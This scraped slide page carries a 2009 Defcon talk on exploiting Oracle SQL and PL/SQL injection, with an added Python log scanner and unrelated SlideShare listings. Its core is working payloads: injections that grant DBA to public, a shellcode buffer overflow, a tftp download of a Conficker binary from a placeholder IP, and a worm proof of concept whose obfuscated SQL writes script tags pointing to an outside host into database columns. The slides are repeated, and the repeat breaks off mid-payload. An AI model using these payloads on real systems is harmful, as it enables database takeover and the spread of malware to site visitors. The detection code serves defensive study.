The Making Of Second SQL Injection Worm (Oracle Edition)

Sumit Siddharth
SID@notsosecure.com
www.notsosecure.com
Defcon 17
Las Vegas, 2009
About Me:
Senior IT Security Consultant

More than 4 years of Penetration Testing

Not an Oracle Geek :(

My Blog: www.notsosecure.com

10 slides + 2 Demos= 20 Mins !!

             Defcon 17, Las Vegas, July 2009   2
Agenda
 How to exploit SQL injection in web
 applications with an Oracle back-end to achieve
 the following:
 Escalate privileges from the session user to that
  of SYS (Similar to openrowset hacks in MS SQL)
 Execute OS Commands and achieve file system
  read/write access (Like xp_cmdshell in MS SQL)
 Can worms target Oracle web apps? (Just as
  they did against MS SQL)

Oracle: How Things Work
By default Oracle comes with a lot of stored
 procedures and functions.
Mostly these functions and stored procedures
 run with definer privileges (default).
In order to make the function execute with the
 privileges of the user executing it, the function
 must have 'authid current_user' keyword.
If you find a SQL (PL/SQL) injection in a
 function owned by SYS and with 'authid definer',
 you can run SQL (PL/SQL) as SYS.
SQL Injection in Oracle:
PL/SQL Injection                                 SQL Injection
 • Injection in an anonymous PL/SQL block         • Injection in a single SQL statement
 • No restriction                                 • Restrictions: no ';' allowed
 • Execute DDL, DML                               • Need more vulnerabilities
 • Easy                                           • Difficult

PL/SQL Injection
    Injection in Anonymous PL/SQL block
create or replace procedure orasso.test (q IN varchar2) AS

BEGIN
execute immediate ('begin '||q||'; end;');
END;
* The attack has no limitations
* Can execute DML and DDL statements
* Easy to exploit
* Can execute multiple statements:
* q=>null;execute immediate 'grant dba to public';end'--

PL/SQL Injection from Web Apps
 Vulnerable Oracle Application Server allows PL/SQL injection
     Bypass the PL/SQL exclusion list:
         http://host:7777/pls/orasso/orasso.home?);execute+immediate+:1;--={PL/SQL}
     Execute PL/SQL with the permissions of the user configured in the 'DAD'
      (orasso_public)
     Exploit vulnerable procedures and become DBA
     Don't rely on 'create function' privileges
         LT.COMPRESSWORKSPACETREE (CPU Oct 2008; milw0rm:7677)
         LT.FINDRICSET (CPU October 2007; milw0rm:4572)
         .....100 more of these.....
     Execute OS code (I prefer Java)
Hacking OAS with OAP_Hacker.pl
 OAP_hacker.pl
    Supports O.A.S <= 10.1.2.2
   Relies on a PL/SQL injection vulnerability
   Exploits vulnerable packages and grants DBA to 'public'
       Generally orasso_public does not have the create function
        privilege
       Exploit based on cursor injection; doesn't need create
        function
   OS code execution based on Java
   Demo
PL/SQL Injection
 Custom-written packages deployed on OAS may have PL/SQL injection
 Example:
create or replace procedure orasso.test(q IN varchar2) AS
BEGIN
....
execute immediate ('begin '||q||'; end;');
.....
end;
 http://host/pls/orasso/orasso.test?q=orasso.home
 http://host/pls/orasso/orasso.test?q=execute Immediate 'grant dba to public'


SQL Injection In Web Apps.
Injection in a single SQL statement:
  e.g. “Select a from b where c=”.'$input'
Oracle does not support stacked queries (multiple statements in one
 SQL statement).
To execute multiple statements we need to find a PL/SQL
 injection.
How can we inject PL/SQL when the web application's
 SQL injection allows only SQL?
If there is a PL/SQL injection vulnerability in a
 function, then we can use the web app's SQL injection to call
 this function, thereby executing PL/SQL via SQL
 injection.
SQL Injection and Vulnerable Functions
We can call functions in SQL but not procedures
Exploit functions vulnerable to buffer overflow and other issues


 MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
 DDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGG
 GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHH
 HHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR (227)||CHR(251)||CHR(90)||
 CHR(19)||CHR(124)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||
 chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||
 chr(255)||chr(208)||'dir >c:dir.txt')--


Exploit Functions vulnerable to PL/SQL Injection
    ➔If Authid=definer; execute PL/SQL with definer privileges
    ➔If Authid=current_user; execute PL/SQL; exploit vulnerable packages
        ➔Privilege escalation; become DBA
        ➔Execute OS Code


Introducing Dbms_Export_Extension
It's an Oracle package which has had a number
 of functions and procedures vulnerable to
 PL/SQL injection, allowing privilege escalation.
GET_DOMAIN_INDEX_TABLES() is a function
 vulnerable to PL/SQL injection; it is owned by SYS and
 runs as SYS.
We can inject PL/SQL within this function and
 the PL/SQL will get executed as SYS.
The function can be called from SQL queries
 such as SELECT, INSERT, UPDATE etc.
PL/SQL Injection in dbms_export_extension
FUNCTION GET_DOMAIN_INDEX_TABLES ( INDEX_NAME IN VARCHAR2, INDEX_SCHEMA IN
   VARCHAR2, TYPE_NAME IN VARCHAR2, TYPE_SCHEMA IN VARCHAR2, READ_ONLY IN
   PLS_INTEGER, VERSION IN VARCHAR2, GET_TABLES IN PLS_INTEGER)
RETURN VARCHAR2 IS
BEGIN
[...]


STMTSTRING := 'BEGIN ' || '"' || TYPE_SCHEMA || '"."' || TYPE_NAME ||
 '".ODCIIndexUtilCleanup(:p1); ' || 'END;';


DBMS_SQL.PARSE(CRS, STMTSTRING, DBMS_SYS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(CRS,':p1',GETTABLENAMES_CONTEXT);
[...]
END GET_DOMAIN_INDEX_TABLES;


Example
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR',
 'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;
 BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;-- ',
 'SYS',0,'1',0) from dual
Fixed in CPU April 2006.
Vulnerable versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4,
 10.2.0.1 - 10.2.0.2, XE
Bsqlbf v2.3
Uses this Oracle exploit to achieve the
 following:
  Privilege escalation (Type 3)
  OS code execution (Type 4)
      with Java (default; stype 0)
      with plsql_native_make_utility (Oracle 9; stype 1)
      with dbms_scheduler (oracle 10; stype 2)
  File system read/write access (Type 5;Java only)
  Demo available at www.notsosecure.com
SQL Injection w0rms
   MS-SQL:

   Oracle:
        http://127.0.0.1:81/ora4.php?name=1 and 1=(select
         SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
         PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set
         current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||
         chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name||
         chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)||
         chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)||
         chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)||
         chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||
         chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE
         T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like
         chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE
         rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--

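A detection-side companion to the two worm payloads above, added here as an example and not part of the original slides: the Python below normalizes web-server request lines the way an analyst would (URL-decode, decode the chr()||chr() chains the Oracle worm uses, flatten the nested quote doubling) and flags the markers that appear in the payloads on slides 5, 7, 9, 14 and 16. The access-log lines are constructed samples and the finding names are my own.

```python
import re
from urllib.parse import unquote_plus

# Tokens that appear in the payloads shown on the slides (slides 5, 7, 9, 14 and 16).
# Matching runs on the normalized, upper-cased request, so the list is upper-case.
MARKERS = (
    "DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES",
    "LT.FINDRICSET",
    "LT.COMPRESSWORKSPACETREE",
    "PRAGMA AUTONOMOUS_TRANSACTION",
    "EXECUTE IMMEDIATE",
    "GRANT DBA TO PUBLIC",
    "<SCRIPT SRC=",   # the stored-XSS string the worm writes into VARCHAR columns
)

# One chr(N) call, and a chain of them joined by ||, e.g. chr(117)||chr(112)
CHR_CALL = re.compile(r"chr\s*\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
CHR_CHAIN = re.compile(
    r"chr\s*\(\s*\d{1,3}\s*\)(?:\s*\|\|\s*chr\s*\(\s*\d{1,3}\s*\))*", re.IGNORECASE
)
# Request target inside a combined-format access-log line
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def decode_chr_chains(sql: str) -> str:
    """Replace every chr(N)||chr(M)... run with the characters it builds.

    The decoded text is for matching and for an analyst to read; the result is
    not re-quoted, so it is no longer valid SQL.
    """
    def build(match):
        return "".join(chr(int(code)) for code in CHR_CALL.findall(match.group(0)))
    return CHR_CHAIN.sub(build, sql)


def normalize(request: str) -> str:
    """URL-decode, decode chr() chains, flatten nested quote doubling, collapse whitespace."""
    text = decode_chr_chains(unquote_plus(request))
    while "''" in text:   # '''' -> '' -> ' (each pass strictly shortens the text)
        text = text.replace("''", "'")
    return " ".join(text.split()).upper()


def scan_request(request: str) -> list:
    """Return the findings for one request target (path plus query string)."""
    findings = []
    decoded = unquote_plus(request)
    if decode_chr_chains(decoded) != decoded:
        findings.append("CHR_CHAIN_OBFUSCATION")
    text = normalize(request)
    findings.extend(marker for marker in MARKERS if marker in text)
    # Slide 7: a PL/SQL gateway request whose query string carries a statement
    # terminator is the exclusion-list bypass pattern.
    path, _, query = decoded.partition("?")
    if path.upper().startswith("/PLS/") and ";" in query:
        findings.append("PLSQL_GATEWAY_EXCLUSION_BYPASS")
    return findings


def scan_log(log_text: str) -> list:
    """Return (line number, findings) for every access-log line that triggers a finding."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        findings = scan_request(match.group(1))
        if findings:
            hits.append((lineno, findings))
    return hits


# Constructed sample access-log lines (not real traffic): a benign request, the
# slide-14 privilege-escalation call, a shortened chr()-encoded fragment in the
# style of the slide-16 worm, and the slide-7 PL/SQL gateway bypass.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jul/2009:10:01:02 +0000] "GET /ora4.php?name=1 HTTP/1.1" 200 512
10.0.0.9 - - [15/Jul/2009:10:01:07 +0000] "GET /ora4.php?name=1%20and%201=(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(:P1);EXECUTE%20IMMEDIATE%20%27%27DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN%20EXECUTE%20IMMEDIATE%20%27%27%27%27%20grant%20dba%20to%20public%27%27%27%27;END;%27%27;END;--%20%27,%27SYS%27,0,%271%27,0)%20from%20dual)-- HTTP/1.1" 200 512
10.0.0.9 - - [15/Jul/2009:10:02:11 +0000] "GET /ora4.php?name=1%20and%201=(select%20chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)||chr(61)%20from%20dual)-- HTTP/1.1" 200 512
10.0.0.12 - - [15/Jul/2009:10:03:30 +0000] "GET /pls/orasso/orasso.home?);execute+immediate+:1;--={PL/SQL} HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}")
```

The chr() decoding is the step that matters for the worm on this slide: without it the update/script string never appears in the request text, so a plain keyword match misses it.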
What 'could' the worm do
 Update certain database tables
   The website now starts to distribute malware
   Pwn legitimate users of the site with browser exploits
        There are enough IE 0-days out there.
 OS code execution allows distribution of other worms such as Conficker!
   select LinxRunCmd('tftp -i x.x.x.x GET conflicker.exe') from dual
 Exploit other Oracle components on the internal network
   Oracle Secure Backup: remote command injection (CPU 2009)
   SQL injection in Oracle Enterprise Manager (CPU 2009)
   TNS Listener exploits (milw0rm: 8507)
   ....100 other things to do....

Demos
Demo 1: Hacking OAS with OAS_hacker.pl

Demo 2: Privilege escalation; extracting data with SYS privileges (visit www.notsosecure.com)

Demo 3: OS code execution with Java (@ notsosecure)

Demo 4: PoC for a potential Oracle SQL injection worm




Thank You
References:
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_lt_findricset.html
http://www.breach.com/resources/breach-security-labs/alerts/breach-security-labs-releases-alert-on-oracle-application-ser
http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1&saveSkin=true&pages=0&replyNum
http://milw0rm.com/exploits/3269
http://www.securityfocus.com/bid/17699
http://www.orafaq.com/wiki/PL/SQL_FAQ#What_is_the_difference_between_SQL_and_PL.2FSQL.3F
http://www.red-database-security.com/wp/confidence2009.pdf
http://alloracletech.blogspot.com/2008/07/authid-definer-vs-authid-currentuser.html
http://www.owasp.org/index.php/Testing_for_Oracle
http://www.red-database-security.com/wp/google_oracle_hacking_us.pdf
http://lab.mediaservice.net/notes_more.php?id=Oracle_Portal_for_Friends
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf
And lots more; can't fit in the space here....
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Dernier (20)

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm

  • 1. The Making Of Second SQL Injection Worm (Oracle Edition)
    Sumit Siddharth
    SID@notsosecure.com
    www.notsosecure.com
    Defcon 17, Las Vegas, 2009
  • 2. About Me:
    Senior IT Security Consultant
    More than 4 years of Penetration Testing
    Not an Oracle Geek :(
    My Blog: www.notsosecure.com
    10 slides + 2 Demos = 20 Mins !!
    Defcon 17, Las Vegas, July 2009
  • 3. Agenda
    How to exploit SQL Injections in web applications with an Oracle back-end to achieve the following:
    - Escalate privileges from the session user to that of SYS (similar to the openrowset hacks in MS SQL)
    - Execute OS commands and achieve file system read/write access (like xp_cmdshell in MS SQL)
    - Can worms target Oracle web apps? (Just as they did against MS SQL)
  • 4. Oracle: How Things Work
    By default Oracle comes with a lot of stored procedures and functions.
    Most of these functions and stored procedures run with definer privileges (the default).
    In order to make a function execute with the privileges of the user executing it, the function must be declared with the 'authid current_user' keyword.
    If you find a SQL (PL/SQL) injection in a function owned by SYS and declared 'authid definer', you can run SQL (PL/SQL) as SYS.
  • 5. SQL Injection in Oracle:
    PL/SQL Injection
    - Injection in an anonymous PL/SQL block
    - No restriction
    - Execute DDL, DML
    - Easy
    SQL Injection
    - Injection in a single SQL statement
    - Restrictions: no ';' allowed
    - Need more vulnerabilities
    - Difficult
  • 6. PL/SQL Injection
    Injection in an anonymous PL/SQL block:
      create or replace procedure orasso.test (q IN varchar2) AS
      BEGIN
        execute immediate ('begin '||q||'; end;');
      END;
    * Attack has no limitation
    * Can execute DML and DDL statements
    * Easy to exploit
    * Can execute multiple statements:
      q=>null;execute immediate 'grant dba to public';end'--
  • 7. PL/SQL Injection from Web Apps
    - A vulnerable Oracle Application Server allows PL/SQL injection
    - Bypass the PL/SQL exclusion list:
        http://host:7777/pls/orasso/orasso.home?);execute+immediate+:1; --={PL/SQL}
    - Execute PL/SQL with the permissions of the user described in the 'DAD' (orasso_public)
    - Exploit vulnerable procedures and become DBA
    - Don't rely on 'create function' privileges
        LT.COMPRESSWORKSPACETREE (CPU Oct 2008; milw0rm:7677)
        LT.FINDRICSET (CPU October 2007; milw0rm:4572)
        .....100 more of these.....
    - Execute OS code (I prefer Java)
  • 8. Hacking OAS with OAP_Hacker.pl
    - OAP_hacker.pl supports O.A.S <= 10.1.2.2
    - Relies on a PL/SQL injection vulnerability
    - Exploits vulnerable packages and grants DBA to 'public'
    - Generally orasso_public does not have the create function privilege
    - Exploit based on cursor injection; doesn't need create function
    - OS code execution based on Java
    Demo
  • 9. PL/SQL Injection
    Custom written packages deployed on OAS may have PL/SQL injection
    Example:
      create or replace procedure orasso.test(q IN varchar2) AS
      BEGIN
        ....
        execute immediate ('begin '||q||'; end;');
        .....
      end;
    http://host/pls/orasso/orasso.test?q=orasso.home
    http://host/pls/orasso/orasso.test?q=execute Immediate 'grant dba to public'
  • 10. SQL Injection In Web Apps
    Injection in a single SQL statement, e.g. "Select a from b where c=".'$input'
    Oracle does not support stacked queries in SQL, so an injection into a single statement cannot append a second one.
    To execute multiple queries we need to find a PL/SQL injection.
    How can we inject PL/SQL when the web application's SQL injection allows only SQL?
    If there is a PL/SQL injection vulnerability in a function, then we can use the web's SQL injection to call this function, thereby executing PL/SQL via SQL injection.
  • 11. SQL Injection and Vulnerable Functions
    We can call functions in SQL but not procedures
    Exploit functions vulnerable to buffer overflow and other issues:
      MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD DDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGG GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHH HHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR (227)||CHR(251)||CHR(90)|| CHR(19)||CHR(124)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)|| chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)|| chr(255)||chr(208)||'dir >c:dir.txt')--
    Exploit functions vulnerable to PL/SQL injection:
    ➔ If authid=definer: execute PL/SQL with definer privileges
    ➔ If authid=current_user: execute PL/SQL; exploit vulnerable packages
    ➔ Privilege escalation; become DBA
    ➔ Execute OS code
  • 12. Introducing Dbms_Export_Extension
    It's an Oracle package which has had a number of functions and procedures vulnerable to PL/SQL injection, allowing privilege escalation.
    GET_DOMAIN_INDEX_TABLES(): function vulnerable to PL/SQL injection; owned by SYS; runs as SYS
    We can inject PL/SQL within this function and the PL/SQL will get executed as SYS.
    The function can be called from SQL queries such as SELECT, INSERT, UPDATE etc.
  • 13. PL/SQL Injection in dbms_export_extension
      FUNCTION GET_DOMAIN_INDEX_TABLES (
        INDEX_NAME   IN VARCHAR2,
        INDEX_SCHEMA IN VARCHAR2,
        TYPE_NAME    IN VARCHAR2,
        TYPE_SCHEMA  IN VARCHAR2,
        READ_ONLY    IN PLS_INTEGER,
        VERSION      IN VARCHAR2,
        GET_TABLES   IN PLS_INTEGER) RETURN VARCHAR2
      IS
      BEGIN
        [...]
        STMTSTRING := 'BEGIN ' || '"' || TYPE_SCHEMA || '"."' || TYPE_NAME || '".ODCIIndexUtilCleanup(:p1); ' || 'END;';
        DBMS_SQL.PARSE(CRS, STMTSTRING, DBMS_SYS_SQL.V7);
        DBMS_SQL.BIND_VARIABLE(CRS, ':p1', GETTABLENAMES_CONTEXT);
        [...]
      END GET_DOMAIN_INDEX_TABLES;
  • 14. Example
      select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual
    Fixed in CPU April 2006.
    Vulnerable versions: Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1 - 10.2.0.2, XE
  • 15. Bsqlbf v2.3
    Uses this Oracle exploit to achieve the following:
    - Privilege escalation (Type 3)
    - OS code execution (Type 4)
        with Java (default; stype 0)
        with plsql_native_make_utility (Oracle 9; stype 1)
        with dbms_scheduler (Oracle 10; stype 2)
    - File system read/write access (Type 5; Java only)
    Demo available at www.notsosecure.com
  • 16. SQL Injection w0rms
    MS-SQL:
      s=290';DECLARE%20@S%20NVARCHAR(4000);=CAST(0x[hex-encoded payload omitted]%20AS%20NVARCHAR(4000));EXEC(@S);--
    Oracle:
      http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate 